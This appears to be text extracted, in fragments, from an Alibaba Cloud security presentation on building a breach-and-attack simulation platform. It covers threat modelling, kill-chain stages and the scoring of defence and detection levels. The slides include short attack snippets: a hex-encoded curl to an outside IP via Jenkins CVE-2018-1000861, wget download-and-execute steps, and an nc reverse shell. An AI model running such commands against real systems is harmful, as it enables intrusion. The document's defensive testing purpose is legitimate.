阿里云安全：入侵攻擊模擬演練平臺建設實踐（31頁）.pdf

1、什么是入侵攻擊模擬要解決的問題存在的挑戰入侵攻擊模擬演練機制簡介突破入口模擬防御水位衡量模擬演練機制簡介檢測/響應水位衡量其他業務場景落地企業采用多種安全措施，每一種都可能因配置錯誤/運營問題失效，且難以察覺如僅依靠藍軍或外采滲透測試，案例數量較少、時間上不連續、可能遺漏、成本高安全水位無法量化，建設效果難以衡量從攻擊者視角對企業基礎設施進行持續的自動化安全測試針對安全措施失效、藍軍成本高的問題定義模型量化當前安全水位，發現問題，反哺防御檢測能力-解決無法量化的問題2017年，Gartner將入侵攻擊模擬技術(BAS)列為威脅對抗Hype Cycle中的新類別如何對入侵攻擊場景進行威脅建模并分

2、級如何持續、盡量真實地測試并避免穩定性問題防御、檢測水位如何量化評估什么是入侵攻擊模擬要解決的問題存在的挑戰入侵攻擊模擬演練機制簡介突破入口模擬防御水位衡量模擬演練機制簡介檢測/響應水位衡量其他業務場景落地殺傷鏈模型攻擊行為模擬-衡量檢測響應水位突破入口模擬-衡量防御水位尋找突破入口實施惡意行為阻止攻擊檢測響應修復“利用成功”前后攻防重點不同攻擊方防守方模擬演練方腳本小子專業藍軍國家頂尖技術水平一般，主要利用現成工具；資源少技術水平較高，自行編寫工具；資源較多技術水平高，可能使用0day；資源豐富什么是入侵攻擊模擬要解決的問題存在的挑戰入侵攻擊模擬演練機制簡介突破入口模擬防御水位衡量模擬演練機

3、制簡介檢測/響應水位衡量其他業務場景落地錄入測試插件原子能力測試隨機撥測回歸測試枚舉入侵威脅防御措施?攔截未攔防御措施防御措施變更攻擊1攻擊2攻擊3攻擊1攻擊2攻擊3優化防御策略目標入口攻擊向量繞過手法惡意行為Web通用組件-Jenkins(腳本語言為Groovy)遠程命令執行漏洞CVE-2018-1000861編碼-十六進制編碼(Groovy原生支持hex和base64)連接惡意網站-curl 120.26.xx.xx:23333“curl 120.26.xx.xx:23333”的十六進制編碼目標入口Target of Attack/Vulnerable Point攻擊向量Attack Ve

4、ctor/Vulnerability繞過手法Bypass/Escape/Encoding惡意行為Shellcode/Command/Malicious OutcomeWeb服務及組件其他服務自研服務/組件通用服務/組件注入服務端請求偽造(SSRF)不安全的反序列化訪問控制存在問題XXX編碼語法語義架構/性能數據滲出后門植入/持久化權限提升憑證竊取自研服務/組件通用服務/組件什么是入侵攻擊模擬要解決的問題存在的挑戰入侵攻擊模擬演練機制簡介突破入口模擬防御水位衡量模擬演練機制簡介檢測/響應水位衡量其他業務場景落地目標入口攻擊向量攻擊類型繞過手法惡意行為POC測試時間攔截情況目標1向量1類型1繞過1

5、行為1時間1目標2向量2類型2繞過2行為2時間2目標3向量3類型3繞過3行為3時間3測試結果匯總攻擊類型攔截數/攻擊數未攔截詳情命令執行/SQL注入/總計/原子能力衡量目標入口攔截數/攻擊數分析目標10/100未接入防御措施目標236/100防御措施不足隨機撥測回歸測試測試樣例測試時間(變更前)攔截測試時間(變更后)攔截分析攻擊1正常攻擊2變更導致防御失效總計10088需回滾什么是入侵攻擊模擬要解決的問題存在的挑戰入侵攻擊模擬演練機制簡介突破入口模擬防御水位衡量模擬演練機制簡介檢測/響應水位衡量其他業務場景落地演練劇本編排攻擊指令執行反入侵團隊介入演練報告生成l 隨機化劇本生成 機器數 應用范

6、圍 攻擊階段。攻擊路徑生成后門植入命令與控制持久化數據竊取。攻擊手法分配輸入參數后門植入命令與控制持久化數據竊取。HOW？1.wget http:/ backdoor3./backdoor4.攻擊手法序列攻擊命令序列l 攻擊手法組件化（已集成300+手法）突破入口后門植入命令與控制權限提升持久化。Fastjson反序列化wget下載Bash反彈shelldirty cowcrontab定時任務CVE-2018-1000861curl下載http后門sudoLinux創建用戶。l 攻擊手法組件化目錄發現shell.run(“ls/”)http后門shell=remote(“nc lvv port

7、”）;pathwget下載執行wget URL O path;chmod+x path 參數傳遞（path）參數傳遞（shell）后門植入命令與控制發現什么是入侵攻擊模擬要解決的問題存在的挑戰入侵攻擊模擬演練機制簡介突破入口模擬防御水位衡量模擬演練機制簡介檢測/響應水位衡量其他業務場景落地l ATT&CK矩陣維度突破入口后門植入命令與控制?？蓹z測手法數302045總手法數402050比例75%100%90%l 事件等級評定（單次事件緯度）將各維度得分相加 0 5分腳本小子級別 510分專業藍軍級別=11分國家頂尖級別項目得分0分1分2分機器數量10Attck子矩陣覆蓋數量=7l 檢測水位衡量矩陣（單次事件緯度）突破入口后門植入命令與控制。進程網絡文件/。l 響應水位衡量突破入口后門植入命令與控制。止血。溯源。什么是入侵攻擊模擬要解決的問題存在的挑戰入侵攻擊模擬演練機制簡介突破入口模擬防御水位衡量模擬演練機制簡介檢測/響應水位衡量其他業務場景落地能力穩定性日常撥測 每日隨機演練，確保IDS告警產出的穩定性能力回歸測試 IDS有更新時自測有效性后再上線歷史入侵事件復現 通過構造特定劇本，沉淀歷史入侵事件用于復測